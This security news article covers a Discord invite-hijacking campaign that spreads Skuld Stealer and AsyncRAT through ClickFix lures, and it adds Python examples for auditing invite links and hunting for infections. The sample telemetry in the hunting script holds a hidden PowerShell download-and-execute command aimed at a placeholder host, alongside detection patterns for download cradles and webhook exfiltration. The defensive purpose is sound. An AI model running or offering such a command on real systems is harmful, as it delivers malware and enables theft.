A recent malware campaign has abused a weakness in Discord's invite system to distribute the Skuld information stealer and the AsyncRAT remote access trojan.
According to a technical report by Check Point, the attackers registered custom vanity links that reuse the codes of expired or deleted invites, so links published by legitimate communities silently started resolving to attacker-controlled servers. The campaign combined this with the ClickFix social-engineering technique, multi-stage loaders and time-based evasion to deliver AsyncRAT and a customized Skuld Stealer aimed at cryptocurrency wallets.
The underlying problem is that an expired or deleted invite code can be claimed again by someone else. A link that a community posted months ago on a forum, in a README or on social media still looks identical and carries the same code, but it now takes users wherever the new holder of that code points it.
Check Point's findings come shortly after it uncovered a phishing campaign that used expired vanity invite links to lure users into a Discord server, where they were told to visit a site to "verify" ownership; those who did had their digital assets stolen.
Discord lets server administrators create temporary invites, permanent invites and custom (vanity) invite links, the last of which Discord reserves for boosted servers. Check Point found that when a custom vanity code is chosen, Discord does not prevent reuse of a code that previously belonged to an expired or deleted invite, so an attacker can register a vanity link with the same code and capture everyone who still follows the old link.
Because an invite link encodes only the code and not the server it is supposed to open, the redirect to a look-alike server controlled by the threat actor is invisible to the user: the URL they click is exactly the one they trusted before.
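Community operators who have published invite links can check whether those links still lead where they should. The following Python script is an added example, not Check Point's or Discord's code: it audits a list of published invite URLs against the guild ID each one was posted for, using Discord's public invite endpoint (`GET https://discord.com/api/v10/invites/{code}`, which answers 404 for an expired or deleted code). The resolver is injectable, so the demo runs offline against constructed responses; the invite codes, guild IDs and server names below are invented.

```python
"""Audit published Discord invite links: does each one still resolve to the
guild it was posted for?  Added example; not Check Point's or Discord's code."""
import json
import re
import urllib.error
import urllib.request
from typing import Callable, Optional

# Accepts discord.gg/<code>, discord.com/invite/<code>, discordapp.com/invite/<code>.
INVITE_RE = re.compile(
    r"(?:https?://)?(?:www\.)?(?:discord\.gg|discord(?:app)?\.com/invite)/([A-Za-z0-9-]+)")


def extract_invite_code(url: str) -> Optional[str]:
    m = INVITE_RE.search(url)
    return m.group(1) if m else None


def fetch_invite(code: str) -> Optional[dict]:
    """Resolve a code through Discord's public invite endpoint.  Returns the
    parsed JSON (which carries guild.id and guild.name) or None when Discord
    answers 404 (Unknown Invite), i.e. the code has expired or been deleted."""
    req = urllib.request.Request(
        f"https://discord.com/api/v10/invites/{code}",
        headers={"User-Agent": "invite-audit/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return None
        raise


def check_invite(url: str, expected_guild_id: str,
                 resolve: Callable[[str], Optional[dict]] = fetch_invite) -> str:
    """Classify one link.  Compare guild IDs, not names: a hijacked vanity
    link can point at a server that copies the original's name and icon."""
    code = extract_invite_code(url)
    if code is None:
        return "not-an-invite"
    data = resolve(code)
    if data is None:
        # Expired/deleted: this code is exactly what an attacker can now claim
        # as a vanity URL, so retire the link wherever it was published.
        return "dead"
    guild_id = str((data.get("guild") or {}).get("id"))
    return "ok" if guild_id == str(expected_guild_id) else "hijacked"


def audit(published: dict, resolve=fetch_invite) -> dict:
    """published maps invite URL -> guild ID it is supposed to open."""
    return {url: check_invite(url, gid, resolve) for url, gid in published.items()}


# Constructed responses standing in for the live endpoint so the demo runs
# offline; codes, IDs and names are invented.
SAMPLE_RESPONSES = {
    "legit123": {"code": "legit123",
                 "guild": {"id": "111111111111111111", "name": "Example Community"}},
    "oldcode7": {"code": "oldcode7",  # re-registered as a vanity URL by someone else
                 "guild": {"id": "999999999999999999", "name": "Example Community"}},
}


def sample_resolver(code: str) -> Optional[dict]:
    return SAMPLE_RESPONSES.get(code)


# Constructed inventory of links a community might have published (invented).
PUBLISHED = {
    "https://discord.gg/legit123": "111111111111111111",
    "https://discord.com/invite/oldcode7": "111111111111111111",
    "https://discord.gg/expired99": "111111111111111111",
}

if __name__ == "__main__":
    for url, verdict in audit(PUBLISHED, sample_resolver).items():
        print(f"{verdict:14} {url}")
```

Run it periodically with the real `fetch_invite` against the links you have published. A "dead" verdict matters as much as a "hijacked" one: a dead code is exactly what can be re-registered, so the link should be replaced at its source before someone else claims it.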
The attack therefore starts by claiming the codes of invite links belonging to legitimate communities and redirecting their users to a malicious server. Newly arrived users are prompted to complete a verification step by authorizing a bot, which sends them to a fake website with a "Verify" button.
That button runs the ClickFix social-engineering tactic: under the guise of verification, the page places a command on the victim's clipboard and instructs them to paste it into the Windows Run dialog. The pasted command launches PowerShell, which downloads a script that starts a chain of loaders ending in the deployment of AsyncRAT and Skuld Stealer.
AsyncRAT uses a dead drop resolver to find its command-and-control server: instead of hardcoding the address, the implant fetches it from a legitimate public web service, so the operators can move infrastructure without rebuilding the malware. Skuld is an information stealer that harvests data from Discord, browsers, crypto wallets and gaming platforms, including wallet seed phrases and saved passwords.
The chain also uses a customized build of ChromeKatz to get around Chrome's app-bound encryption by pulling cookies and credentials from the running browser's memory. Stolen data is exfiltrated through a Discord webhook, so the outbound traffic goes to discord.com over HTTPS and blends in with normal Discord usage.
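Two of the stages above leave telemetry a defender can hunt on: the pasted ClickFix command shows up as PowerShell spawned by explorer.exe with a hidden window and a download-and-execute cradle, and the webhook exfiltration shows up as an HTTP POST to a Discord webhook URL from a process that is neither the Discord client nor a browser. The Python below is an added example, not detection content from Check Point's report; it runs both heuristics over constructed records shaped like EDR process-creation and network events. The paths, URLs, parent processes and byte counts are invented.

```python
"""Hunting heuristics for two stages of the chain above: a ClickFix-style
PowerShell launch and exfiltration through a Discord webhook.  Added example
over constructed telemetry; not Check Point's detection content."""
import re

# Image names ClickFix lures have the victim paste commands into (Win+R runs
# the command as a child of explorer.exe).
RUN_DIALOG_PARENTS = {"explorer.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
HIDDEN_RE = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)
CRADLE_RE = re.compile(
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I)
EXEC_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)

# Discord webhook URLs: a POST here delivers a message (and attachments) to a
# channel the webhook owner controls, over ordinary HTTPS to discord.com.
WEBHOOK_RE = re.compile(
    r"^https://(?:[\w-]+\.)?discord(?:app)?\.com/api/(?:v\d+/)?webhooks/\d+/", re.I)
# Processes with a plausible reason to call a webhook; everything else is suspect.
WEBHOOK_ALLOWED = {"discord.exe", "chrome.exe", "msedge.exe", "firefox.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_process_event(ev: dict) -> list:
    """Return the reasons a process-creation event looks like a pasted ClickFix
    command, or [] if it does not.  Requires a download/execute primitive plus
    at least one launch-context indicator so ordinary admin use stays quiet."""
    if basename(ev["image"]) not in POWERSHELL:
        return []
    cmd = ev["cmdline"]
    context, primitive = [], []
    if basename(ev["parent"]) in RUN_DIALOG_PARENTS:
        context.append("launched from explorer.exe (Run dialog)")
    if HIDDEN_RE.search(cmd):
        context.append("hidden window")
    if CRADLE_RE.search(cmd):
        primitive.append("download cradle")
    if EXEC_RE.search(cmd):
        primitive.append("in-memory execution")
    return context + primitive if context and primitive else []


def score_network_event(ev: dict):
    """Flag a POST to a Discord webhook from a process that has no business
    using one.  Returns a reason string or None."""
    if ev["method"].upper() != "POST" or not WEBHOOK_RE.match(ev["url"]):
        return None
    image = basename(ev["image"])
    if image in WEBHOOK_ALLOWED:
        return None
    return f"webhook POST from {image} ({ev['bytes_out']} bytes out)"


# Constructed sample telemetry (not real logs): a benign shell start, a pasted
# ClickFix-style command, a developer build, then three network events.
PROCESS_EVENTS = [
    {"image": r"C:\Windows\explorer.exe", "parent": r"C:\Windows\System32\userinit.exe",
     "cmdline": "explorer.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm https://verify.example.invalid/step)"'},
    {"image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "cmdline": "pwsh -NoProfile -File build.ps1"},
]
NETWORK_EVENTS = [
    {"image": r"C:\Users\v\AppData\Local\Discord\app-1.0.9\Discord.exe", "method": "POST",
     "url": "https://discord.com/api/v9/gateway", "bytes_out": 512},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "method": "POST",
     "url": "https://discord.com/api/webhooks/123456789012345678/tokentoken", "bytes_out": 2048},
    {"image": r"C:\Users\v\AppData\Roaming\svchost.exe", "method": "POST",
     "url": "https://discord.com/api/webhooks/123456789012345678/tokentoken", "bytes_out": 184320},
]


def hunt(process_events=PROCESS_EVENTS, network_events=NETWORK_EVENTS) -> list:
    """Run both heuristics and return (kind, event_index, detail) findings."""
    findings = []
    for i, ev in enumerate(process_events):
        reasons = score_process_event(ev)
        if reasons:
            findings.append(("clickfix", i, reasons))
    for i, ev in enumerate(network_events):
        reason = score_network_event(ev)
        if reason:
            findings.append(("webhook-exfil", i, reason))
    return findings


if __name__ == "__main__":
    for kind, idx, detail in hunt():
        print(kind, idx, detail)
```

The process rule deliberately demands both a launch-context indicator and a download-or-execute primitive, because either alone is common in legitimate administration. The webhook rule is an allowlist: any browser can legitimately hit a webhook, but a binary named svchost.exe living under a user profile cannot, and the size of the POST body is a useful triage hint for how much left the host.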
Discord has since disabled the malicious bot, disrupting this attack chain. Check Point also identified a second campaign by the same threat actor that distributed a modified hacktool for unlocking pirated games; it was hosted on Bitbucket and had been downloaded 350 times.
Victims of these campaigns are located primarily in the US, Vietnam, France, Germany, Slovakia, Austria, the Netherlands and the UK. The incident shows how criminals turn an ordinary platform feature, here the reuse of expired invite codes, into a delivery channel for sophisticated attacks on cryptocurrency users for financial gain.